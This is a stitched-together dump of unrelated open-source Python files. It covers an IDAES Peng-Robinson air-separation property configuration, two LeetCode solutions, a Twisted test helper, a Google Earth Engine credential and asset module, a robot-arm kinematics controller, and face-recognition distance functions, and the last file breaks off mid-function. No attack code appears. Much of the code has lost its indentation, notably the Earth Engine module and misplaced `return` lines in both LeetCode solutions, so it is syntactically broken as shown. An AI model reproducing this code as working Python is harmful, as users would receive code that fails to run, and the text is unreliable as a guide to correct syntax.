idaes/generic_models/properties/core/examples/ASU_PR.py | carldlaird/idaes-pse | 112 | 8911 | <filename>idaes/generic_models/properties/core/examples/ASU_PR.py
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
Air separation phase equilibrium package using Peng-Robinson EoS.
Example property package using the Generic Property Package Framework.
This example shows how to set up a property package to do air separation
phase equilibrium in the generic framework using Peng-Robinson equation
along with methods drawn from the pre-built IDAES property libraries.
The example includes two dictionaries.
1. The dictionary named configuration contains parameters obtained from
The Properties of Gases and Liquids (1987) 4th edition and NIST.
2. The dictionary named configuration_Dowling_2015 contains parameters used in
A framework for efficient large scale equation-oriented flowsheet optimization
(2015) Dowling. The Antoine vapor pressure coefficients and acentric factors
are extracted from The Properties of Gases and Liquids (1977) 3rd edition,
and the heat capacity values from the same edition are converted to J.
"""
# Import Python libraries
import logging
# Import Pyomo units
from pyomo.environ import units as pyunits
# Import IDAES cores
from idaes.core import LiquidPhase, VaporPhase, Component
from idaes.generic_models.properties.core.state_definitions import FTPx
from idaes.generic_models.properties.core.eos.ceos import Cubic, CubicType
from idaes.generic_models.properties.core.phase_equil import SmoothVLE
from idaes.generic_models.properties.core.phase_equil.bubble_dew import \
LogBubbleDew
from idaes.generic_models.properties.core.phase_equil.forms import log_fugacity
from idaes.generic_models.properties.core.pure import RPP4
from idaes.generic_models.properties.core.pure import NIST
from idaes.generic_models.properties.core.pure import RPP3
# Set up logger
_log = logging.getLogger(__name__)
# ---------------------------------------------------------------------
# Configuration dictionary for a Peng-Robinson Oxygen-Argon-Nitrogen system
# Data Sources:
# [1] The Properties of Gases and Liquids (1987)
# 4th edition, Chemical Engineering Series - <NAME>
# [2] NIST, https://webbook.nist.gov/
# Retrieved 16th August, 2020
# [3] The Properties of Gases and Liquids (1987)
# 3rd edition, Chemical Engineering Series - <NAME>
#     Cp parameters were converted to J in Dowling 2015
# [4] A framework for efficient large scale equation-oriented flowsheet optimization (2015)
# Computers and Chemical Engineering - <NAME>
configuration = {
# Specifying components
"components": {
"nitrogen": {"type": Component,
"enth_mol_ig_comp": RPP4,
"entr_mol_ig_comp": RPP4,
"pressure_sat_comp": NIST,
"phase_equilibrium_form": {("Vap", "Liq"): log_fugacity},
"parameter_data": {
"mw": (28.0135E-3, pyunits.kg/pyunits.mol), # [1]
"pressure_crit": (34e5, pyunits.Pa), # [1]
"temperature_crit": (126.2, pyunits.K), # [1]
"omega": 0.037, # [1]
"cp_mol_ig_comp_coeff": {
"A": (3.115E1,
pyunits.J/pyunits.mol/pyunits.K), # [1]
"B": (-1.357E-2,
pyunits.J/pyunits.mol/pyunits.K**2),
"C": (2.680E-5,
pyunits.J/pyunits.mol/pyunits.K**3),
"D": (-1.168E-8,
pyunits.J/pyunits.mol/pyunits.K**4)},
"enth_mol_form_vap_comp_ref": (
0.0, pyunits.J/pyunits.mol), # [2]
"entr_mol_form_vap_comp_ref": (
191.61, pyunits.J/pyunits.mol/pyunits.K), # [2]
"pressure_sat_comp_coeff": {
"A": (3.7362, None), # [2]
"B": (264.651, pyunits.K),
"C": (-6.788, pyunits.K)}}},
"argon": {"type": Component,
"enth_mol_ig_comp": RPP4,
"entr_mol_ig_comp": RPP4,
"pressure_sat_comp": NIST,
"phase_equilibrium_form": {("Vap", "Liq"): log_fugacity},
"parameter_data": {
"mw": (39.948E-3, pyunits.kg/pyunits.mol), # [1]
"pressure_crit": (48.98e5, pyunits.Pa), # [1]
"temperature_crit": (150.86, pyunits.K), # [1]
"omega": 0.001, # [1]
"cp_mol_ig_comp_coeff": {
"A": (2.050E1,
pyunits.J/pyunits.mol/pyunits.K), # [1]
"B": (0.0, pyunits.J/pyunits.mol/pyunits.K**2),
"C": (0.0, pyunits.J/pyunits.mol/pyunits.K**3),
"D": (0.0, pyunits.J/pyunits.mol/pyunits.K**4)},
"enth_mol_form_vap_comp_ref": (
0.0, pyunits.J/pyunits.mol), # [2]
"entr_mol_form_vap_comp_ref": (
154.8, pyunits.J/pyunits.mol/pyunits.K), # [2]
"pressure_sat_comp_coeff": {"A": (3.29555, None), # [2]
"B": (215.24, pyunits.K),
"C": (-22.233, pyunits.K)}}},
"oxygen": {"type": Component,
"enth_mol_ig_comp": RPP4,
"entr_mol_ig_comp": RPP4,
"pressure_sat_comp": NIST,
"phase_equilibrium_form": {("Vap", "Liq"): log_fugacity},
"parameter_data": {
"mw": (31.999E-3, pyunits.kg/pyunits.mol), # [1]
"pressure_crit": (50.43e5, pyunits.Pa), # [1]
"temperature_crit": (154.58, pyunits.K), # [1]
"omega": 0.025, # [1]
"cp_mol_ig_comp_coeff": {
"A": (2.811E1, pyunits.J/pyunits.mol/pyunits.K),
"B": (-3.680E-6,
pyunits.J/pyunits.mol/pyunits.K**2),
"C": (1.746E-5, pyunits.J/pyunits.mol/pyunits.K**3),
"D": (-1.065E-8,
pyunits.J/pyunits.mol/pyunits.K**4)},
"enth_mol_form_vap_comp_ref": (
0.0, pyunits.J/pyunits.mol), # [2]
"entr_mol_form_vap_comp_ref": (
205.152, pyunits.J/pyunits.mol/pyunits.K), # [2]
"pressure_sat_comp_coeff": {
"A": (3.85845, None), # [2]
"B": (325.675, pyunits.K),
"C": (-5.667, pyunits.K)}}}},
# Specifying phases
"phases": {"Liq": {"type": LiquidPhase,
"equation_of_state": Cubic,
"equation_of_state_options": {
"type": CubicType.PR}},
"Vap": {"type": VaporPhase,
"equation_of_state": Cubic,
"equation_of_state_options": {
"type": CubicType.PR}}},
# Set base units of measurement
"base_units": {"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K},
# Specifying state definition
"state_definition": FTPx,
"state_bounds": {"flow_mol": (0, 100, 1000, pyunits.mol/pyunits.s),
"temperature": (10, 300, 350, pyunits.K),
"pressure": (5e4, 1e5, 1e7, pyunits.Pa)},
"pressure_ref": (101325, pyunits.Pa),
"temperature_ref": (298.15, pyunits.K),
# Defining phase equilibria
"phases_in_equilibrium": [("Vap", "Liq")],
"phase_equilibrium_state": {("Vap", "Liq"): SmoothVLE},
"bubble_dew_method": LogBubbleDew,
"parameter_data": {"PR_kappa": {("nitrogen", "nitrogen"): 0.000,
("nitrogen", "argon"): -0.26e-2,
("nitrogen", "oxygen"): -0.119e-1,
("argon", "nitrogen"): -0.26e-2,
("argon", "argon"): 0.000,
("argon", "oxygen"): 0.104e-1,
("oxygen", "nitrogen"): -0.119e-1,
("oxygen", "argon"): 0.104e-1,
("oxygen", "oxygen"): 0.000}}}
configuration_Dowling_2015 = {
# Specifying components
"components": {
"nitrogen": {"type": Component,
"enth_mol_ig_comp": RPP4,
"entr_mol_ig_comp": RPP4,
"pressure_sat_comp": RPP3,
"phase_equilibrium_form": {("Vap", "Liq"): log_fugacity},
"parameter_data": {
"mw": (28.0135E-3, pyunits.kg/pyunits.mol), # [3]
"pressure_crit": (33.943875e5, pyunits.Pa), # [4]
"temperature_crit": (126.2, pyunits.K), # [4]
"omega": 0.04, # [3]
"cp_mol_ig_comp_coeff": {
'A': (3.112896E1, pyunits.J/pyunits.mol/pyunits.K), # [3]
'B': (-1.356E-2, pyunits.J/pyunits.mol/pyunits.K**2),
'C': (2.6878E-5, pyunits.J/pyunits.mol/pyunits.K**3),
'D': (-1.167E-8, pyunits.J/pyunits.mol/pyunits.K**4)},
"enth_mol_form_vap_comp_ref": (
0.0, pyunits.J/pyunits.mol), # [2]
"entr_mol_form_vap_comp_ref": (
191.61, pyunits.J/pyunits.mol/pyunits.K), # [2]
"pressure_sat_comp_coeff": {
'A': (14.9342, None), # [3]
'B': (588.72, pyunits.K),
'C': (-6.60, pyunits.K)}}},
"argon": {"type": Component,
"enth_mol_ig_comp": RPP4,
"entr_mol_ig_comp": RPP4,
"pressure_sat_comp": RPP3,
"phase_equilibrium_form": {("Vap", "Liq"): log_fugacity},
"parameter_data": {
"mw": (39.948E-3, pyunits.kg/pyunits.mol), # [3]
"pressure_crit": (48.737325e5, pyunits.Pa), # [4]
"temperature_crit": (150.86, pyunits.K), # [4]
"omega": -0.004, # [1]
"cp_mol_ig_comp_coeff": {
'A': (2.0790296E1, pyunits.J/pyunits.mol/pyunits.K), # [3]
'B': (-3.209E-05, pyunits.J/pyunits.mol/pyunits.K**2),
'C': (5.163E-08, pyunits.J/pyunits.mol/pyunits.K**3),
'D': (0.0, pyunits.J/pyunits.mol/pyunits.K**4)},
"enth_mol_form_vap_comp_ref": (
0.0, pyunits.J/pyunits.mol), # [3]
"entr_mol_form_vap_comp_ref": (
154.8, pyunits.J/pyunits.mol/pyunits.K), # [3]
"pressure_sat_comp_coeff": {
'A': (15.2330, None), # [3]
'B': (700.51, pyunits.K),
'C': (-5.84, pyunits.K)}}},
"oxygen": {"type": Component,
"enth_mol_ig_comp": RPP4,
"entr_mol_ig_comp": RPP4,
"pressure_sat_comp": RPP3,
"phase_equilibrium_form": {("Vap", "Liq"): log_fugacity},
"parameter_data": {
"mw": (31.999E-3, pyunits.kg/pyunits.mol), # [3]
"pressure_crit": (50.45985e5, pyunits.Pa), # [4]
"temperature_crit": (154.58, pyunits.K), # [4]
"omega": 0.021, # [1]
"cp_mol_ig_comp_coeff": {
'A': (2.8087192E1, pyunits.J/pyunits.mol/pyunits.K), # [3]
'B': (-3.678E-6, pyunits.J/pyunits.mol/pyunits.K**2),
'C': (1.745E-5, pyunits.J/pyunits.mol/pyunits.K**3),
'D': (-1.064E-8, pyunits.J/pyunits.mol/pyunits.K**4)},
"enth_mol_form_vap_comp_ref": (
0.0, pyunits.J/pyunits.mol), # [2]
"entr_mol_form_vap_comp_ref": (
205.152, pyunits.J/pyunits.mol/pyunits.K), # [2]
"pressure_sat_comp_coeff": {
'A': (15.4075, None), # [3]
'B': (734.55, pyunits.K),
'C': (-6.45, pyunits.K)}}}},
# Specifying phases
"phases": {"Liq": {"type": LiquidPhase,
"equation_of_state": Cubic,
"equation_of_state_options": {
"type": CubicType.PR}},
"Vap": {"type": VaporPhase,
"equation_of_state": Cubic,
"equation_of_state_options": {
"type": CubicType.PR}}},
# Set base units of measurement
"base_units": {"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K},
# Specifying state definition
"state_definition": FTPx,
"state_bounds": {"flow_mol": (0, 100, 1000, pyunits.mol/pyunits.s),
"temperature": (10, 300, 350, pyunits.K),
"pressure": (5e4, 1e5, 1e7, pyunits.Pa)},
"pressure_ref": (101325, pyunits.Pa),
"temperature_ref": (298.15, pyunits.K),
# Defining phase equilibria
"phases_in_equilibrium": [("Vap", "Liq")],
"phase_equilibrium_state": {("Vap", "Liq"): SmoothVLE},
"bubble_dew_method": LogBubbleDew,
"parameter_data": {"PR_kappa": {("nitrogen", "nitrogen"): 0.000,
("nitrogen", "argon"): -0.26e-2,
("nitrogen", "oxygen"): -0.119e-1,
("argon", "nitrogen"): -0.26e-2,
("argon", "argon"): 0.000,
("argon", "oxygen"): 0.104e-1,
("oxygen", "nitrogen"): -0.119e-1,
("oxygen", "argon"): 0.104e-1,
("oxygen", "oxygen"): 0.000}}}
|
Python/longest-valid-parentheses.py | shreyventure/LeetCode-Solutions | 388 | 8914 | '''
Speed: 95.97%
Memory: 24.96%
Time complexity: O(n)
Space complexity: O(n)
'''
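# Worked example (added for illustration): for s = ")()())" the longest valid
# substring is "()()" with length 4; the index stack below records the position
# just before the current valid run so each span length is computed in O(1).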
class Solution(object):
    def longestValidParentheses(self, s):
        ans = 0
        # Stack holds indices; the sentinel -1 marks the position just before
        # the current run of valid parentheses.
        stack = [-1]
        for i in range(len(s)):
            if s[i] == '(':
                stack.append(i)
            else:
                stack.pop()
                if len(stack) == 0:
                    # Unmatched ')': reset the base index.
                    stack.append(i)
                else:
                    # Length of the valid substring ending at i.
                    ans = max(ans, i - stack[-1])
return ans |
distdeepq/__init__.py | Silvicek/distributional-dqn | 131 | 8957 | from distdeepq import models # noqa
from distdeepq.build_graph import build_act, build_train # noqa
from distdeepq.simple import learn, load, make_session # noqa
from distdeepq.replay_buffer import ReplayBuffer, PrioritizedReplayBuffer # noqa
from distdeepq.static import *
from distdeepq.plots import PlotMachine
|
LeetCode/python3/287.py | ZintrulCre/LeetCode_Archiver | 279 | 9012 | class Solution:
    def findDuplicate(self, nums: List[int]) -> int:
        # Floyd's tortoise-and-hare cycle detection: treat nums as a linked
        # list where index i points to nums[i]; the duplicate is the cycle entry.
        p1, p2 = nums[0], nums[nums[0]]
        while nums[p1] != nums[p2]:
            p1 = nums[p1]
            p2 = nums[nums[p2]]
        # Phase 2: restart one pointer from the head; they meet at the entry.
        p2 = 0
        while nums[p1] != nums[p2]:
            p1 = nums[p1]
            p2 = nums[p2]
return nums[p1]
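    # Example (illustration only): findDuplicate([1, 3, 4, 2, 2]) returns 2,
    # since following index -> nums[index] forms a cycle whose entry point is
    # the duplicated value.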
|
src/twisted/test/myrebuilder1.py | mathieui/twisted | 9,953 | 9013 | <reponame>mathieui/twisted<filename>src/twisted/test/myrebuilder1.py
class A:
def a(self):
return 'a'
class B(A, object):
def b(self):
return 'b'
class Inherit(A):
def a(self):
return 'c'
|
modules/google-earth-engine/docker/src/sepalinternal/gee.py | BuddyVolly/sepal | 153 | 9015 | import json
from threading import Semaphore
import ee
from flask import request
from google.auth import crypt
from google.oauth2 import service_account
from google.oauth2.credentials import Credentials
service_account_credentials = None
import logging
export_semaphore = Semaphore(5)
get_info_semaphore = Semaphore(2)
def init_service_account_credentials(args):
global service_account_credentials
with open(args['gee_key_path'], 'r') as file_:
key_data = file_.read()
signer = crypt.RSASigner.from_string(key_data)
service_account_credentials = service_account.Credentials(
signer=signer,
service_account_email=args['gee_email'],
token_uri=ee.oauth.TOKEN_URI,
scopes=ee.oauth.SCOPES + ['https://www.googleapis.com/auth/drive']
)
def init_ee():
credentials = service_account_credentials
if 'sepal-user' in request.headers:
user = json.loads(request.headers['sepal-user'])
googleTokens = user.get('googleTokens', None)
if googleTokens:
credentials = Credentials(googleTokens['accessToken'])
ee.InitializeThread(credentials)
def to_asset_id(asset_path):
asset_roots = ee.data.getAssetRoots()
if not asset_roots:
raise Exception('User has no GEE asset roots')
return asset_roots[0]['id'] + '/' + asset_path
def delete_asset_collection(asset_id):
logging.info('Recursively deleting ' + asset_id)
if ee.data.getInfo(asset_id):
images = ee.data.getList({
'id': asset_id,
'fields': 'id'
})
for image in images:
ee.data.deleteAsset(image['id'])
logging.info('Deleted ' + image['id'])
ee.data.deleteAsset(asset_id)
logging.info('Deleted ' + asset_id)
def create_asset_image_collection(asset_id):
delete_asset_collection(asset_id)
ee.data.create_assets(
asset_ids=[asset_id],
asset_type=ee.data.ASSET_TYPE_IMAGE_COLL,
mk_parents=True
)
def create_asset_folder(asset_id):
ee.data.create_assets(
asset_ids=[asset_id],
asset_type=ee.data.ASSET_TYPE_FOLDER,
mk_parents=True
)
def get_info(ee_object):
try:
get_info_semaphore.acquire()
return ee_object.getInfo()
finally:
get_info_semaphore.release()
|
PyIK/src/litearm.py | AliShug/EvoArm | 110 | 9018 | <reponame>AliShug/EvoArm
from __future__ import print_function
import numpy as np
import struct
import solvers
import pid
from util import *
MOTORSPEED = 0.9
MOTORMARGIN = 1
MOTORSLOPE = 30
ERRORLIM = 5.0
class ArmConfig:
"""Holds an arm's proportions, limits and other configuration data"""
def __init__(self,
main_length = 148.4,
forearm_length = 160,
linkage_length = 155,
lower_actuator_length = 65,
upper_actuator_length = 54.4,
wrist_length = 90.52,
shoulder_offset = [-9.7, 18.71]):
self.main_length = main_length
self.forearm_length = forearm_length
self.linkage_length = linkage_length
self.lower_actuator_length = lower_actuator_length
self.upper_actuator_length = upper_actuator_length
        self.wrist_length = wrist_length
self.shoulder_offset = shoulder_offset
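# Usage sketch (illustrative, not from the original file): the defaults above
# describe the reference arm, so configs can be built as
#   cfg = ArmConfig()                          # stock proportions
#   long_cfg = ArmConfig(forearm_length=180)   # hypothetical longer forearm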
class ArmPose:
"""
Defines a physical configuration of a LiteArm robot arm.
Internal angles are relative to vertical (elevator/actuator) or straight
forward (swing), and are stored in radians. Extracted servo angles range
0-300 and are measured in degrees.
Provides methods for:
- finding the required servo angles to reach the pose
- checking the validity of the pose
"""
structFormat = 'fffff'
@staticmethod
def calcElevatorAngle(servoAngle):
return radians(178.21 - servoAngle)
@staticmethod
def calcSwingAngle(servoAngle):
return radians(150.0 - servoAngle)
@staticmethod
def calcActuatorAngle(servoAngle):
return radians(servoAngle - 204.78)
@staticmethod
def calcWristXAngle(servoAngle):
return radians(150.0 - servoAngle)
@staticmethod
def calcWristYAngle(servoAngle):
return radians(servoAngle - 147.0)
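    # Worked conversions (illustrative): calcSwingAngle(150.0) == 0.0 rad
    # (servo centred in its 0-300 degree range) and calcElevatorAngle(178.21)
    # == 0.0 rad; the getServo* methods below apply the inverse mapping back
    # to servo degrees.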
def __init__(self,
arm_config,
swing_angle,
shoulder_angle,
actuator_angle,
elbow_angle,
elbow2D,
wrist2D,
effector2D,
effector,
wrist_x,
wrist_y):
self.cfg = arm_config
self.swing_angle = swing_angle
self.shoulder_angle = shoulder_angle
self.actuator_angle = actuator_angle
self.elbow_angle = elbow_angle
# Joints in the arm
shoulder = rotate(self.cfg.shoulder_offset, swing_angle)
self.shoulder2D = [self.cfg.shoulder_offset[1], 0]
self.shoulder = [shoulder[0], 0, shoulder[1]]
self.wrist2D = wrist2D
self.effector2D = effector2D
self.effector = effector
# Construct the 3D elbow & wrist positions from the 2D (planar) IK
# solution
arm_vec = effector - self.shoulder
arm_vec[1] = 0
self.elbow2D = elbow2D
self.elbow = self.shoulder + normalize(arm_vec)*elbow2D[0]
self.elbow[1] = elbow2D[1]
self.wrist = self.effector - normalize(arm_vec)*arm_config.wrist_length
# Wrist pose
self.wristXAngle = wrist_x
self.wristYAngle = wrist_y
def getServoElevator(self):
return 178.21 - degrees(self.shoulder_angle)
def getServoActuator(self):
return degrees(self.actuator_angle) + 204.78
def getServoSwing(self):
return 150 - degrees(self.swing_angle)
def getServoWristX(self):
return 150 - degrees(self.wristXAngle)
def getServoWristY(self):
return 147 + degrees(self.wristYAngle)
def armDiffAngle(self):
return degrees(self.shoulder_angle - self.actuator_angle)
def checkActuator(self):
angle = self.getServoActuator()
return angle >= 95 and angle <= 250
def checkDiff(self):
angle = self.armDiffAngle()
return angle >= 44 and angle <= 175
def checkElevator(self):
angle = self.getServoElevator()
return angle >= 60 and angle <= 210
def checkForearm(self):
angle = degrees(self.elbow_angle + self.shoulder_angle)
return angle < 200 and angle > 80
def checkSwing(self):
angle = self.getServoSwing()
return angle >= 60 and angle <= 240
def checkWristX(self):
angle = self.getServoWristX()
return angle >= 60 and angle <= 240
def checkWristY(self):
angle = self.getServoWristY()
return angle >= 60 and angle <= 160
def checkPositioning(self):
# When Y>0 Forearm always faces outwards
if self.wrist2D[1] > 0 and self.wrist2D[0] < self.elbow2D[0]:
return False
# No valid positions X<=0
if self.wrist2D[0] <= 0:
return False
# Effector height range
if self.effector[1] > 180 or self.effector[1] < -200:
return False
return True
def checkClearance(self):
return (self.checkDiff() and self.checkActuator() and
self.checkElevator() and self.checkSwing() and
self.checkWristX() and self.checkWristY() and
self.checkPositioning() and self.checkForearm())
def serialize(self):
"""Returns a packed struct holding the pose information"""
return struct.pack(
ArmPose.structFormat,
self.swing_angle,
self.shoulder_angle,
self.elbow_angle,
self.wristXAngle,
self.wristYAngle
)
class ArmController:
def __init__(self,
servo_swing,
servo_shoulder,
servo_elbow,
servo_wrist_x,
servo_wrist_y,
arm_config,
motion_enable = False):
# Solvers are responsible for calculating the target servo positions to
# reach a given goal position
self.ik = solvers.IKSolver(
arm_config.main_length,
arm_config.forearm_length,
arm_config.wrist_length,
arm_config.shoulder_offset)
self.physsolver = solvers.PhysicalSolver(
arm_config.main_length,
arm_config.linkage_length,
arm_config.lower_actuator_length,
arm_config.upper_actuator_length)
# Servos
self.servos = {}
self.servos["swing"] = servo_swing
self.servos["shoulder"] = servo_shoulder
self.servos["elbow"] = servo_elbow
self.servos["wrist_x"] = servo_wrist_x
self.servos["wrist_y"] = servo_wrist_y
for key, servo in self.servos.iteritems():
if servo is None:
print ("Warning: {0} servo not connected".format(key))
else:
# Initialise a PID controller for the servo
if servo.protocol == 1:
servo.setGoalSpeed(-MOTORSPEED)
servo.data['pid'] = pid.PIDControl(2.4, 0, 0.4)
else:
servo.setGoalSpeed(0)
servo.data['error'] = 0.0
# Make sure the goal speed is set
servo.setTorqueEnable(1)
if servo.protocol == 1:
print("Setting slope")
servo.setCWMargin(MOTORMARGIN)
servo.setCCWMargin(MOTORMARGIN)
servo.setCWSlope(MOTORSLOPE)
servo.setCCWSlope(MOTORSLOPE)
# Store parameters
self.motion_enable = True
self.enableMovement(False)
self.cfg = arm_config
# Dirty flags for stored poses
self.ik_pose = None
self.ik_dirty = True
self.real_pose = None
self.real_dirty = True
# Current target pose
self.target_pose = None
def enableMovement(self, enable):
changed = False
if enable and not self.motion_enable:
print ("Warning: Arm enabled")
self.motion_enable = True
changed = True
elif not enable:
self.motion_enable = False
changed = True
if changed:
# Set servos on/off
if self.servos['swing'] is not None:
self.servos['swing'].setTorqueEnable(self.motion_enable)
if self.servos['shoulder'] is not None:
self.servos['shoulder'].setTorqueEnable(self.motion_enable)
if self.servos['elbow'] is not None:
self.servos['elbow'].setTorqueEnable(self.motion_enable)
if self.servos['wrist_x'] is not None:
self.servos['wrist_x'].setTorqueEnable(self.motion_enable)
if self.servos['wrist_y'] is not None:
self.servos['wrist_y'].setTorqueEnable(self.motion_enable)
def setWristGoalPosition(self, pos):
self.ik.setGoal(pos)
self.ik_dirty = True
def setWristGoalDirection(self, normal):
self.ik.setWristDir(normal)
self.ik_dirty = True
def getIKPose(self):
if self.ik_dirty and self.ik.valid:
# Construct geometry of arm from IK state
main_arm = self.ik.elbow - self.ik.originpl
arm_vert_angle = sigangle(main_arm, vertical)
forearm = self.ik.wristpl - self.ik.elbow
elbow_angle = angle_between(main_arm, forearm)
# Solve actuator angle for given elbow angle
# Base angle is between the main arm and actuator
base_angle = self.physsolver.inverse_forearm(elbow_angle)
actuator_angle = arm_vert_angle - base_angle
self.ik_pose = ArmPose(
self.cfg,
swing_angle = self.ik.swing,
# angles from vertical
shoulder_angle = arm_vert_angle,
actuator_angle = actuator_angle,
# angle between the main arm and forearm
elbow_angle = elbow_angle,
elbow2D = self.ik.elbow,
wrist2D = self.ik.wristpl,
effector2D = self.ik.goalpl,
effector = self.ik.goal,
wrist_x = self.ik.wrist_x,
wrist_y = self.ik.wrist_y
)
return self.ik_pose
def pollServos(self):
"""Poll the real-world servo positions"""
for servo in self.servos.itervalues():
if servo is not None:
newPos = servo.getPosition()
if type(newPos) is float:
servo.data['pos'] = newPos
def clearPositionError(self):
"""Clears the servo's position-error accumulators"""
for servo in self.servos.itervalues():
if servo is not None and servo.protocol == 1:
servo.data['error'] = 0.0
def getRealPose(self):
"""Retrieve the real-world arm pose, or None if not all servos are
connected.
"""
if any([servo is None for servo in self.servos.itervalues()]):
return None
# This whole function is essentially just FK based on the known servo
# angles
swing_servo = self.servos['swing'].data['pos']
elevator_servo = self.servos['shoulder'].data['pos']
actuator_servo = self.servos['elbow'].data['pos']
wrist_x_servo = self.servos['wrist_x'].data['pos']
wrist_y_servo = self.servos['wrist_y'].data['pos']
# Find the internal arm-pose angles for the given servo positions
swing_angle = ArmPose.calcSwingAngle(swing_servo)
elevator_angle = ArmPose.calcElevatorAngle(elevator_servo)
actuator_angle = ArmPose.calcActuatorAngle(actuator_servo)
wrist_x_angle = ArmPose.calcWristXAngle(wrist_x_servo)
wrist_y_angle = ArmPose.calcWristYAngle(wrist_y_servo)
# Solve elbow angle for given actuator and elevator angles
# (this is the angle from the elevator arm's direction to the forearm's)
elbow_angle = self.physsolver.solve_forearm(elevator_angle, actuator_angle)
# FK positions from config and angles
offset = self.cfg.shoulder_offset
shoulder2D = np.array([offset[1], 0])
elbow2D = shoulder2D + rotate(vertical, elevator_angle)*self.cfg.main_length
wrist2D = elbow2D + rotate(vertical, elevator_angle + elbow_angle)*self.cfg.forearm_length
effector2D = wrist2D + [self.cfg.wrist_length, 0]
# 3D Effector calculation is a little more involved
td = rotate([offset[0], effector2D[0]], swing_angle)
effector = np.array([td[0], effector2D[1], td[1]])
pose = ArmPose(
self.cfg,
swing_angle, elevator_angle, actuator_angle,
elbow_angle, elbow2D, wrist2D, effector2D,
effector, wrist_x_angle, wrist_y_angle)
return pose
def setTargetPose(self, new_pose):
self.target_pose = new_pose
def tick(self):
if self.target_pose is not None:
if self.motion_enable:
# Drive servos
gain = 0.1
if self.servos['swing'] is not None:
s = self.servos['swing']
pos = s.data['pos']
target = self.target_pose.getServoSwing()
# err = min(10, pos-target)
# s.data['error'] += err*gain
s.setGoalPosition(target)
if self.servos['shoulder'] is not None:
s = self.servos['shoulder']
# cumulative error
pos = s.data['pos']
target = self.target_pose.getServoElevator()
err = min(10, pos-target)
s.data['error'] += err*gain
s.data['error'] = np.clip(s.data['error'], -ERRORLIM, ERRORLIM)
s.setGoalPosition(target - s.data['error'])
if self.servos['elbow'] is not None:
s = self.servos['elbow']
pos = s.data['pos']
target = self.target_pose.getServoActuator()
err = min(10, pos-target)
s.data['error'] += err*gain
s.data['error'] = np.clip(s.data['error'], -ERRORLIM, ERRORLIM)
s.setGoalPosition(target - s.data['error'])
if self.servos['wrist_x'] is not None:
self.servos['wrist_x'].setGoalPosition(self.target_pose.getServoWristX())
if self.servos['wrist_y'] is not None:
self.servos['wrist_y'].setGoalPosition(self.target_pose.getServoWristY())
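# Rough usage sketch (assumptions: the five servo driver objects are created
# elsewhere in this project, and lengths use the same units as ArmConfig):
#   controller = ArmController(servo_swing, servo_shoulder, servo_elbow,
#                              servo_wrist_x, servo_wrist_y, ArmConfig())
#   controller.setWristGoalPosition([150, 0, 100])   # hypothetical target
#   controller.setTargetPose(controller.getIKPose())
#   controller.tick()   # call periodically to drive the servos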
|
facerec-master/py/facerec/distance.py | ArianeFire/HaniCam | 776 | 9029 | <reponame>ArianeFire/HaniCam<filename>facerec-master/py/facerec/distance.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) <NAME>. All rights reserved.
# Licensed under the BSD license. See LICENSE file in the project root for full license information.
import numpy as np
class AbstractDistance(object):
def __init__(self, name):
self._name = name
def __call__(self,p,q):
raise NotImplementedError("Every AbstractDistance must implement the __call__ method.")
@property
def name(self):
return self._name
def __repr__(self):
return self._name
class EuclideanDistance(AbstractDistance):
def __init__(self):
AbstractDistance.__init__(self,"EuclideanDistance")
def __call__(self, p, q):
p = np.asarray(p).flatten()
q = np.asarray(q).flatten()
return np.sqrt(np.sum(np.power((p-q),2)))
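# Each distance is used as a callable, e.g. (illustrative):
#   dist = EuclideanDistance()
#   dist([0, 0], [3, 4])   # -> 5.0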
class CosineDistance(AbstractDistance):
"""
Negated Mahalanobis Cosine Distance.
Literature:
"Studies on sensitivity of face recognition performance to eye location accuracy.". Master Thesis (2004), Wang
"""
def __init__(self):
AbstractDistance.__init__(self,"CosineDistance")
def __call__(self, p, q):
p = np.asarray(p).flatten()
q = np.asarray(q).flatten()
return -np.dot(p.T,q) / (np.sqrt(np.dot(p,p.T)*np.dot(q,q.T)))
class NormalizedCorrelation(AbstractDistance):
"""
Calculates the NormalizedCorrelation Coefficient for two vectors.
Literature:
"Multi-scale Local Binary Pattern Histogram for Face Recognition". PhD (2008). Chi Ho Chan, University Of Surrey.
"""
def __init__(self):
AbstractDistance.__init__(self,"NormalizedCorrelation")
def __call__(self, p, q):
p = np.asarray(p).flatten()
q = np.asarray(q).flatten()
pmu = p.mean()
qmu = q.mean()
pm = p - pmu
qm = q - qmu
return 1.0 - (np.dot(pm, qm) / (np.sqrt(np.dot(pm, pm)) * np.sqrt(np.dot(qm, qm))))
class ChiSquareDistance(AbstractDistance):
"""
    Chi-square distance between two histograms.
Literature:
"Studies on sensitivity of face recognition performance to eye location accuracy.". Master Thesis (2004), Wang
"""
def __init__(self):
AbstractDistance.__init__(self,"ChiSquareDistance")
def __call__(self, p, q):
p = np.asarray(p).flatten()
q = np.asarray(q).flatten()
bin_dists = (p-q)**2 / (p+q+np.finfo('float').eps)
return np.sum(bin_dists)
class HistogramIntersection(AbstractDistance):
def __init__(self):
AbstractDistance.__init__(self,"HistogramIntersection")
def __call__(self, p, q):
p = np.asarray(p).flatten()
q = np.asarray(q).flatten()
return np.sum(np.minimum(p,q))
class BinRatioDistance(AbstractDistance):
"""
Calculates the Bin Ratio Dissimilarity.
Literature:
"Use Bin-Ratio Information for Category and Scene Classification" (2010), Xie et.al.
"""
def __init__(self):
AbstractDistance.__init__(self,"BinRatioDistance")
def __call__(self, p, q):
p = np.asarray(p).flatten()
q = np.asarray(q).flatten()
        a = np.abs(1-np.dot(p,q.T)) # np.dot rather than elementwise * so the product reduces to a scalar
b = ((p-q)**2 + 2*a*(p*q))/((p+q)**2+np.finfo('float').eps)
return np.abs(np.sum(b))
class L1BinRatioDistance(AbstractDistance):
"""
Calculates the L1-Bin Ratio Dissimilarity.
Literature:
"Use Bin-Ratio Information for Category and Scene Classification" (2010), Xie et.al.
"""
def __init__(self):
AbstractDistance.__init__(self,"L1-BinRatioDistance")
def __call__(self, p, q):
p = np.asarray(p, dtype=np.float).flatten()
